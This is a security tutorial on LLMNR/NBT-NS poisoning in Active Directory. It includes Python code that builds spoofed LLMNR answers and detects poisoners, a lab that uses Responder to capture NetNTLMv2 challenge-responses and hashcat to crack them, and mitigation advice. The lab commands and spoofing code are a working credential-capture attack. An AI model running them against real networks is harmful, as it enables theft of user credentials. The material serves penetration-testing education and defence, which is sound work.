LLMNR (Link-Local Multicast Name Resolution, RFC 4795) is a name resolution protocol, used mainly by Windows, that kicks in when DNS cannot resolve a hostname. The client multicasts the query to every host on the local link and accepts whatever answer comes back first. Because there is no authentication at all, any host on the segment can claim a name and intercept the authentication attempt that follows, which makes LLMNR a standard first target in internal network attacks.
- Uses UDP port 5355; queries go to the multicast group 224.0.0.252 (FF02::1:3 for IPv6) and answers come back unicast to the querier
- Can be exploited via spoofed responses to capture credentials
- Often works alongside NetBIOS Name Service (NBT-NS, UDP port 137, broadcast) fallback behavior, so both are usually poisoned together
- Commonly used in internal penetration testing scenarios
- Recommended mitigation is disabling LLMNR on enterprise networks
Example: If a client cannot resolve fileserver01 via DNS, it multicasts an LLMNR query asking “Who is fileserver01?” to 224.0.0.252. A malicious host on the same segment can answer with its own address, impersonate that name, and capture the authentication attempt that follows.
Security Flaw in LLMNR
The major weakness of LLMNR is the complete lack of authentication:
- No Authentication Mechanism: LLMNR does not verify whether the responding system is legitimate. Any machine on the local link can reply to a name resolution request.
- Blind Trust on Responses: When a client multicasts a query (e.g., “Who is FILESERVER?”), it accepts the first response received, without validating the identity of the responder.
- No Integrity or Source Verification: There is no built-in method to confirm that the response actually came from the intended host, making spoofing trivial.
- Easy Impersonation by Attackers: Attackers on the same network can pretend to be legitimate services (e.g., file servers, printers, domain controllers).
- Credential Exposure Risk: Once the victim connects to the attacker’s listener (SMB, HTTP/WPAD, and so on), Windows automatically attempts NTLM authentication with the logged-on user’s credentials. The attacker captures the NetNTLMv1/v2 challenge-response (not the NT hash itself), which can be cracked offline or relayed to another host that accepts NTLM without signing.
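To make the blind trust concrete, here is an added example (not code from the original article, and not Responder's code) that builds the query a Windows client multicasts, the spoofed answer a poisoner returns, a parser for both, and a detector that turns the same weakness around: query a name that cannot exist and treat any answer as a poisoner. The packet layout follows RFC 4795's reuse of the DNS message format. The name fileserver01 and the address 10.0.2.7 are the lab values from this article; the probe-<random> naming and the 30-second TTL are assumptions of this example, and DNS compression pointers are not handled.

```python
import random
import struct

# LLMNR reuses the DNS message format (RFC 4795): queries go to the multicast
# group on UDP 5355, answers come back unicast to the querier.
LLMNR_GROUP = "224.0.0.252"      # FF02::1:3 for IPv6
LLMNR_PORT = 5355
TYPE_A, CLASS_IN = 1, 1
FLAG_QR = 0x8000                 # bit 15 set = this message is a response


def encode_name(name: str) -> bytes:
    """DNS-style label encoding: length byte + label, terminated by a zero byte."""
    return b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"


def decode_name(buf: bytes, off: int):
    """Decode labels at buf[off:]; returns (name, offset after the name).
    Compression pointers (0xC0..) are not handled here (assumption: plain labels only)."""
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(buf[off:off + n].decode())
        off += n


def build_query(name: str, txid: int) -> bytes:
    """Client side: 'Who is <name>?' -- header (ID, flags=0, QD=1) + one A/IN question."""
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", TYPE_A, CLASS_IN)


def build_spoofed_answer(query: bytes, ip: str, ttl: int = 30) -> bytes:
    """Poisoner side: echo the ID and question, set QR, append an A record for our own IP.
    Nothing in the protocol lets the client tell this apart from the real host's answer."""
    txid = struct.unpack(">H", query[:2])[0]
    qname, off = decode_name(query, 12)
    question = query[12:off + 4]
    rdata = bytes(int(octet) for octet in ip.split("."))
    rr = encode_name(qname) + struct.pack(">HHIH", TYPE_A, CLASS_IN, ttl, len(rdata)) + rdata
    return struct.pack(">HHHHHH", txid, FLAG_QR, 1, 1, 0, 0) + question + rr


def parse(pkt: bytes) -> dict:
    """Parse an LLMNR query or response into its ID, QR flag, questions and answers."""
    txid, flags, qd, an, _, _ = struct.unpack(">HHHHHH", pkt[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = decode_name(pkt, off)
        qtype, _qclass = struct.unpack(">HH", pkt[off:off + 4])
        off += 4
        questions.append((name, qtype))
    for _ in range(an):
        name, off = decode_name(pkt, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        value = ".".join(str(b) for b in rdata) if rtype == TYPE_A and rdlen == 4 else rdata.hex()
        answers.append((name, rtype, value))
    return {"id": txid, "is_response": bool(flags & FLAG_QR), "questions": questions, "answers": answers}


def poisoner_ip(probe_name: str, txid: int, reply: bytes):
    """Detection: we queried a name that does not exist on the network, so a matching
    answer can only come from a poisoner. Returns the IP it handed out, or None."""
    p = parse(reply)
    if not p["is_response"] or p["id"] != txid:
        return None
    if not any(name.lower() == probe_name.lower() for name, _ in p["questions"]):
        return None
    for _name, rtype, value in p["answers"]:
        if rtype == TYPE_A:
            return value
    return None


if __name__ == "__main__":
    # Live probe: one multicast query for a random bogus name; any reply is a poisoner.
    import socket
    probe = "probe-" + "".join(random.choices("0123456789abcdef", k=8))
    txid = random.randrange(1 << 16)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    sock.settimeout(3)
    sock.sendto(build_query(probe, txid), (LLMNR_GROUP, LLMNR_PORT))
    try:
        data, (src, _) = sock.recvfrom(512)
        ip = poisoner_ip(probe, txid, data)
        print(f"LLMNR poisoner at {src} answered {probe!r} with {ip}" if ip else f"reply from {src} ignored")
    except socket.timeout:
        print("no answer: no LLMNR poisoner on this segment (or LLMNR is disabled)")
```

Run as a script on a lab segment while Responder is up and the probe is answered within a second; with LLMNR disabled by policy nothing answers, which is also the check to run after rolling out the mitigation described later on this page.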
Tools Used in LLMNR Poisoning
1. Responder
- A widely used tool for performing LLMNR/NBT-NS poisoning attacks.
- Listens for broadcast name resolution requests and sends spoofed responses.
- Tricks victims into connecting to the attacker’s machine.
- Captures NetNTLMv1/v2 challenge-responses during authentication attempts (often loosely called “NTLM hashes”; they are not the NT hash, so they cannot be passed, only cracked offline or relayed).
- Also runs rogue services (SMB, HTTP, FTP, LDAP, WPAD proxy, etc.) so that whatever the victim connects to, it ends up authenticating to the attacker.
2. Impacket
- A collection of Python classes and example scripts for working with Windows network protocols (SMB, MSRPC, LDAP, Kerberos, NTLM), used widely in offensive tooling.
- Performs attacks that build on captured or relayed authentication, such as SMB relay (ntlmrelayx), pass-the-hash (which needs a real NT hash, not a NetNTLMv2 capture), and remote command execution (psexec, wmiexec, smbexec).
- Helps attackers move from initial access to privilege escalation and lateral movement.
3. Hashcat
- A powerful password cracking tool used to recover plaintext passwords from captured hashes.
- Supports GPU acceleration for high-speed cracking.
- Uses attack modes such as dictionary (wordlist) attacks, rule-based mutations of a wordlist, masks, and plain brute force.
Hands-On Lab: LLMNR Poisoning in Active Directory
In this lab you poison LLMNR/NBT-NS with Responder on Kali, capture the NetNTLMv2 challenge-response a Windows client (PC1) sends when it opens a share that does not exist, and crack it offline with hashcat.
Step 1: Install Required Tools (Kali Linux)
Responder and the Impacket scripts ship with Kali by default; if either is missing on your Kali machine, install them from the Kali repositories.
Command:
sudo apt update
sudo apt install responder impacket-scripts -y
Step 2: Start Responder
Responder listens for LLMNR, NBT-NS and mDNS requests, spoofs responses, and captures the NTLM challenge-responses that follow.
Command:
sudo responder -I eth0 -wdv
- -I eth0: interface to poison on (use the one attached to the lab subnet)
- -w: start the rogue WPAD proxy, so anything that looks for a proxy via wpad also authenticates to you
- -d: answer DHCP broadcast requests (in current Responder releases this injects the WPAD server via DHCP)
- -v: verbose output, so every captured response is printed to the terminal
Responder prints its listener status and then waits; leave it running while you trigger a lookup from the victim.
Step 3: Trigger the Attack (Victim Machine)
Name resolution has to fail in DNS before the client falls back to LLMNR, so the trigger is a lookup for a name DNS does not know. On PC1, open File Explorer and enter a share name that does not exist, for example:
\\fileserver01
Windows tries DNS, gets no answer, multicasts an LLMNR query for fileserver01, Responder answers with the Kali IP, and the client opens an SMB session to Kali and authenticates with NTLM. Entering the Kali machine’s IP directly (\\10.0.2.7 in this lab) also makes the client authenticate to Responder’s SMB listener and yields the same capture, but it does not exercise LLMNR, because no name is being resolved.
- After this you will see the captured NetNTLMv2 challenge-response in the Responder terminal on your Kali machine, together with the client IP, domain and username.
- Let’s try to crack the hash with hashcat. A NetNTLMv2 response cannot be reversed; it can only be recovered by guessing candidates (wordlist, rules, masks) and recomputing the response until one matches. In this scenario the account uses a weak password that appears in rockyou.txt, which is why hashcat recovers it quickly.
Step 4: Capture the Hash
On Kali Linux, Responder prints the capture and also writes it to its log directory (/usr/share/responder/logs/, one file per protocol and client, e.g. SMB-NTLMv2-SSP-<client-ip>.txt). Each line has the form USER::DOMAIN:server-challenge:NTProofStr:blob, which is exactly the input format hashcat expects for mode 5600. Copy one captured line (Responder logs several if the client retries; one is enough) into a file:
ntlmhash.txt
Step 5: Crack the NTLMv2 Hash
To crack the NetNTLMv2 challenge-response, run:
hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt -O
- -m 5600: NetNTLMv2 hash mode
- rockyou.txt: common password wordlist
- -O: optimized kernels (faster, but caps the maximum password length)
This starts the cracking run; if the password is weak and present in the wordlist, hashcat recovers it and prints it after the hash line. Run hashcat --show with the same mode and hash file afterwards to print entries already cracked into the potfile.
Extracting and Using the Wordlist (rockyou.txt)
In many penetration testing environments, the rockyou.txt wordlist is compressed by default. Before using it for password cracking, it must be extracted.
Step 1: Extract rockyou.txt (if required)
If the wordlist is compressed, navigate to the wordlists directory and decompress it:
cd /usr/share/wordlists
sudo gzip -d rockyou.txt.gz
- This will extract the rockyou.txt file, making it available for use in password cracking tools like Hashcat.
Note: On Windows, download Hashcat from the official site and run it from a terminal. This example uses Ubuntu, so the installation steps may differ, but the hashcat command is the same. Copy the hash file to your host OS and install Hashcat there.
Step 2: Running Hashcat in Resource-Constrained Environments
- Virtual machines with little RAM/CPU and no GPU passthrough can make Hashcat run slowly, crash, or fail to initialize its OpenCL/CUDA backend
- In such cases it is better to run the cracking on the host machine rather than in the VM
- Transfer the hash file from the VM to the host securely (e.g. scp) and treat it as sensitive: a captured response is a credential artifact
Step 3: Using Hashcat on a Host Machine
If you are using a Windows system, download Hashcat from its official source and extract it. Ensure the NTLM hash file is also available on your system before running the tool.
Windows Environment:
- Download Hashcat from the official website
- Extract the tool to a folder
Ensure the following files are available:
- hashcat.exe (named hashcat64.exe in releases before 6.0)
- ntlmhash.txt
- rockyou.txt wordlist
Command:
hashcat.exe -m 5600 ntlmhash.txt C:\path\to\rockyou.txt
Add --force only if hashcat refuses to start because of a driver or runtime warning: it suppresses those checks and can produce wrong or missed results, so installing the vendor OpenCL/CUDA runtime is the better fix.
Linux (Ubuntu or Similar Distributions):
- Install or download Hashcat on the host system
- Ensure both hash file and wordlist are accessible
Command:
hashcat -m 5600 ntlmhash.txt /path/to/rockyou.txt
The same caveat applies to --force here. When the run finishes, hashcat prints the hash line followed by the recovered password and records it in its potfile (hashcat --show displays it again later).
LLMNR Mitigations
Link-Local Multicast Name Resolution (LLMNR) can be exploited by attackers to intercept credentials through spoofed responses. To mitigate this risk, organizations should implement the following controls:
- Disable LLMNR and NBT-NS: Turn LLMNR off via Group Policy (Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution, which sets EnableMulticast to 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient) and disable NetBIOS over TCP/IP on each adapter (WINS tab of the IPv4 settings, or centrally via the DHCP vendor option). This removes the attack surface entirely; verify afterwards that a query for a bogus name gets no answer.
- Enforce strong authentication: Require long, complex passwords and disable NTLMv1 so that captured NetNTLMv2 responses are not crackable in a useful timeframe; where possible, require SMB and LDAP signing so captured authentications cannot be relayed either.
- Apply network access controls: Use 802.1X/NAC and segmentation to limit who and what can connect to the internal network, reducing exposure to rogue devices.
- Monitor for poisoning: Responder answers LLMNR/NBT-NS queries for names that do not exist, so a periodic query for a random bogus name that receives an answer is a reliable indicator of an active poisoner.
Disabling unnecessary name resolution protocols, combined with strong password policies, signing requirements and strict network access controls, significantly reduces the effectiveness of LLMNR poisoning attacks.